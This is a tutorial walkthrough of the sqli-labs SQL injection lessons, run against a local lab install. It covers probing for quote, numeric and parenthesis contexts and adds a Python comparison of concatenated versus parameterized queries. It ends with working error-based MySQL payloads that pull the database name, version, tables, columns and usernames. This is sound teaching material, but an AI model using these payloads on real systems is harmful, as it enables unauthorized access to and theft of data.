SQL injection is one of the OWASP Top 10 and a vulnerability worth studying carefully.
The root cause of an injection attack is that no validation separates program commands from user data, so an attacker can hand program commands to the web application disguised as user input and do whatever they like.
In short: parameters received from the request are passed straight into the database query without any processing.
First, a normal test: enter an ID and the page returns normally.
Appending a single quote to the URL produces an error.
The error reported is:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
From this we guess the database query is:
select * from users where id='1' limit 0,1;
Let's test this by constructing an injection payload:
http://127.0.0.1/sqli-labs-master/Less-1?id=1'and '1'='1
Run the test.
A single-quote (string) injection is one where the query wraps the parameter in single quotes.
First test id=1.
Normal data is returned.
Test with a single quote.
An error is returned:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
Let's strip the message down and look at it.
It says the single quote is the problem.
Guess: the parameter is not wrapped in single quotes here.
Test with injection payloads:
http://127.0.0.1/sqli-labs-master/Less-2?id=1 and 1=1
http://127.0.0.1/sqli-labs-master/Less-2?id=1 and 1=2
The guess is correct.
A numeric injection is one where the value is compared directly as a number, with no wrapping at all.
Test with a single quote '
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
An error; let's analyse it.
' ' 1' ') LIMIT 0,1 '
We see that a ') is missing, so the parameter must be closed with a quote and a parenthesis. Construct the payload:
id=1') and 1=1 --+
Then test with and 1=2.
The vulnerability exists.
This string type closes the query with ') (quote plus parenthesis).
The normal test is skipped here.
Use id=1"
and run the test:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
An error is produced. Analyse it and construct the test payload:
http://localhost/sqli-labs-master/Less-4/?id=1") and 1=1 --+
This is the same as the single-quote string type, with double quotes instead.
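The following is an added example, not code from the original post or from sqli-labs: it rebuilds the three query shapes inferred above (single-quote, numeric, and quote-plus-parenthesis) by string concatenation, next to a parameterized lookup, using an in-memory SQLite table with constructed rows as a stand-in for the MySQL users table (assumption; SQLite accepts the same limit 0,1 syntax). It shows why the probes above change the result set for the concatenated queries and why they cannot for the bound one.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the lab's users table (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users(id integer, username text)")
    conn.executemany("insert into users values(?, ?)", [(1, "alice"), (2, "bob")])
    return conn

# How each lesson embeds the id parameter into the query (inferred from the errors above)
WRAPPERS = {
    "quote":   "select * from users where id='{}' limit 0,1",    # Less-1
    "numeric": "select * from users where id={} limit 0,1",      # Less-2
    "paren":   "select * from users where id=('{}') limit 0,1",  # Less-3
}

def vulnerable_lookup(conn, shape, user_input):
    """Concatenates the raw input into the SQL text.
    Returns the rows, or None when the database rejects the statement
    (the syntax error that the single-quote probe triggers)."""
    sql = WRAPPERS[shape].format(user_input)
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None

def safe_lookup(conn, user_input):
    """Parameterized form: the input is bound as a value, so it is compared
    against the id column and can never change the query's structure."""
    return conn.execute(
        "select * from users where id=? limit 0,1", (user_input,)
    ).fetchall()

if __name__ == "__main__":
    db = make_db()
    # The "--+" of the URL payloads decodes to "-- " (comment to end of line)
    for shape, probe in [("quote", "1' and '1'='1"), ("quote", "1'"),
                         ("numeric", "1 and 1=2"), ("paren", "1') and 1=1 -- ")]:
        print(shape, repr(probe), "->", vulnerable_lookup(db, shape, probe))
    print("bound", repr("1' and '1'='1"), "->", safe_lookup(db, "1' and '1'='1"))
```

Every probe that changes the vulnerable result set is a plain string to the bound query, which returns nothing because no id equals that text.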
select count(*),concat(0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name
Judge the result by changing the number:
order by 3 --+
union select 1,2,3 --+
id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,version(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+